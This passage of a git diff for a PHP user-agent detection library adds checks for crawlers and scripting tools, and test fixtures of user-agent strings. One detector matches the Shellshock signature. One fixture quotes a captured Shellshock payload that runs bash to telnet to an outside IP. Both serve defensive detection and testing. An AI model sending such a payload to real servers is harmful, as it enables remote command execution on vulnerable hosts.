self::$scriptedAgent->setName(ScriptedAgent::AHREFS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Majestic 12 spider. + * + * @return bool + */ + public static function checkRobotMJ12() + { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MJ12); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the LiveLap spider. + * + * @return bool + */ + public static function checkRobotLiveLap() + { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Web Distributed Authoring and Versioning client. Usually unexpected WebDAV requests are hack attempts. + * + * @return bool + */ + public static function checkRobotWebdav() + { + if (stripos(self::$userAgentString, "WEBDAV Client") !== false || + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe + self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MetaURI scraper. + * + * @return bool + */ + public static function checkRobotMetaURI() + { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::METAURI); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); + return true; + } + return false; + } + + /** + * Determine if the agent is the TLSProbe tool. + * + * @return bool + */ + public static function checkRobotTLSProbe() + { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); + return true; + } + return false; + } + + /** + * Determine if the agent is the scoop.it bots. + * + * @return bool + */ + public static function checkRobotScoopIt() + { + if (stripos(self::$userAgentString, "wpif Safari") !== false + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Netcraft SSL Survey. + * + * @return bool + */ + public static function checkRobotNetcraft() + { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the curl library/cli tool. + * + * @return bool + */ + public static function checkRobotCurl() + { + if (stripos(self::$userAgentString, "curl/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::CURL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the python programming language. + * + * @return bool + */ + public static function checkRobotPython() + { + if (stripos(self::$userAgentString, "python-requests/") !== false || + stripos(self::$userAgentString, "python-urllib/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PYTHON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.python.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the GoLang programming language. + * + * @return bool + */ + public static function checkRobotGoLang() + { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOLANG); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://golang.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the perl programming language. + * + * @return bool + */ + public static function checkRobotPerl() + { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PERL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.perl.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the wget tool. + * + * @return bool + */ + public static function checkRobotWget() + { + if (stripos(self::$userAgentString, "Wget/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WGET); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the zgrab TLS banner tool. + * + * @return bool + */ + public static function checkRobotZGrab() + { + if (stripos(self::$userAgentString, "zgrab/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Java programming language. + * + * @return bool + */ + public static function checkRobotJava() + { + if (stripos(self::$userAgentString, "Java/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::JAVA); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the ShellShock exploit. + * + * @return bool + */ + public static function checkRobotShellshock() + { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); + self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); + self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the browsershots testing tool. + * + * @return bool + */ + public static function checkRobotBrowershots() + { + if (stripos(self::$userAgentString, "Browsershots") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://browsershots.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the who.is spider. + * + * @return bool + */ + public static function checkRobotWhois() + { + if (stripos(self::$userAgentString, "who.is bot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WHOIS); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.who.is/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MageReport exploit survey. + * + * @return bool + */ + public static function checkRobotMageReport() + { + if (stripos(self::$userAgentString, "MageReport") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AdBeat advertising survey. + * + * @return bool + */ + public static function checkRobotAdbeat() + { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); + return true; + } + return false; + } + + /** + * Determine if the agent is the SocialRankIO crawler. + * + * @return bool + */ + public static function checkRobotSocialrank() + { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Gluten Free crawler. + * + * @return bool + */ + public static function checkRobotGlutenFree() + { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Proximic spider. + * + * @return bool + */ + public static function checkRobotProximic() + { + if (stripos(self::$userAgentString, "proximic;") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ubermetrics survey. + * + * @return bool + */ + public static function checkRobotUbermetrics() + { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Verisign ips-agent. + * + * @return bool + */ + public static function checkRobotVerisign() + { + if (stripos(self::$userAgentString, "ips-agent") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); + return true; + } + return false; + } +} diff --git a/src/edgeVersionMap.php b/src/edgeVersionMap.php new file mode 100644 index 0000000..3836545 --- /dev/null +++ b/src/edgeVersionMap.php @@ -0,0 +1,70 @@ + '0.10.10049', + '12.10051' => '0.11.10051', + '12.10052' => '0.11.10052', + '12.10061' => '0.11.10061', + '12.10074' => '0.11.10074', + '12.10080' => '0.11.10080', + '12.10122' => '13.10122', + '12.10130' => '15.10130', + '12.10136' => '16.10136', + '12.10149' => '19.10149', + '12.10158' => '20.10158', + '12.10159' => '20.10159', + '12.10162' => '20.10162', + '12.10166' => '20.10166', + '12.10240' => '20.10240', + '12.10512' => '20.10512', + '12.10514' => '20.10514', + '12.10525' => '20.10525', + '12.10532' => '20.10532', + '12.10536' => '20.10536', + '13.10547' => '21.10547', + '13.10549' => '21.10549', + '13.10565' => '23.10565', + '13.10572' => '25.10572', + '13.10576' => '25.10576', + '13.10581' => '25.10581', + '13.10586' => '25.10586', + '13.11082' => '25.11082', + '13.11099' => '27.11099', + '13.11102' => '28.11102', + '13.14251' => '28.14251', + '13.14257' => '28.14257', + '14.14267' => '31.14267', + '14.14271' => '31.14271', + '14.14279' => '31.14279', + '14.14283' => '31.14283', + '14.14291' => '34.14291', + '14.14295' => '34.14295', + '14.14300' => '34.14300', + '14.14316' => '37.14316', + '14.14322' => '37.14322', + '14.14327' => '37.14327', + '14.14328' => '37.14328', + '14.14332' => '37.14332', + '14.14342' => '38.14342', + '14.14352' => '38.14352', + '14.14393' => '38.14393', + '14.14901' => '39.14901', + '14.14905' => '39.14905', + '14.14915' => '39.14915', + '14.14926' => '39.14926', + '14.14931' => '39.14931', + '14.14936' => '39.14936', + '15.14942' => '39.14942', + '15.14946' => '39.14946', + '15.14951' => '39.14951', + '15.14955' => '39.14955', + '15.14959' => '39.14959', + '15.14965' => '39.14965', + '15.14971' => '39.14971', + '15.14977' => '39.14977', + '15.14986' => '39.14986', + '15.15002' => '39.15002', + '15.15007' => '39.15007', + '15.15019' => '40.15019', + '15.15063' => '40.15063', +); diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php new file mode 100644 index 0000000..91a5d08 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -0,0 +1,19 @@ +getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } + } +} diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php new file mode 100644 index 0000000..fb03756 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -0,0 +1,15 @@ +assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); + } +} diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index d6628ec..d0b2d77 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) @@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -110,11 +128,13 @@ Edge - 12.10136 + 16.10136 Windows 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,21 +264,36 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ Edge - 14.14393 + 38.14393 Windows Phone 10 Lumia 640 LTE unknown + unknown + unknown Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 + + Edge + unknown + Windows Phone + 10 + Lumia 640 LTE + unknown + + Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/12.00049 + + BlackBerry 7.1.0.523 @@ -248,6 +301,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -259,20 +314,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 - wkhtmltopdf + Safari unknown Linux unknown unknown unknown + wkhtmltopdf + Tool Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; +http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 (www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..90e898d 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -4,41 +4,53 @@ class UserAgentString { + const UNKNOWN = 'unknown'; + /** * @var string */ - private $browser; + private $browser = self::UNKNOWN; /** * @var string */ - private $browserVersion; + private $browserVersion = self::UNKNOWN; /** * @var string */ - private $os; + private $os = self::UNKNOWN; /** * @var string */ - private $osVersion; + private $osVersion = self::UNKNOWN; /** * @var string */ - private $device; + private $device = self::UNKNOWN; /** * @var string */ - private $deviceVersion; + private $deviceVersion = self::UNKNOWN; /** * @var string */ private $string; + /** + * @var string + */ + private $scriptedAgent = self::UNKNOWN; + + /** + * @var string + */ + private $scriptedAgentType = self::UNKNOWN; + /** * @return string */ @@ -178,4 +190,40 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent + * + * @return string + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + } + + /** + * @return string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType + * + * @return string + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..7aba697 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,41 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . DIRECTORY_SEPARATOR . 'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach ($string->children() as $child) { + $attributes = $child->attributes(); + switch ($attributes['name']) { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + 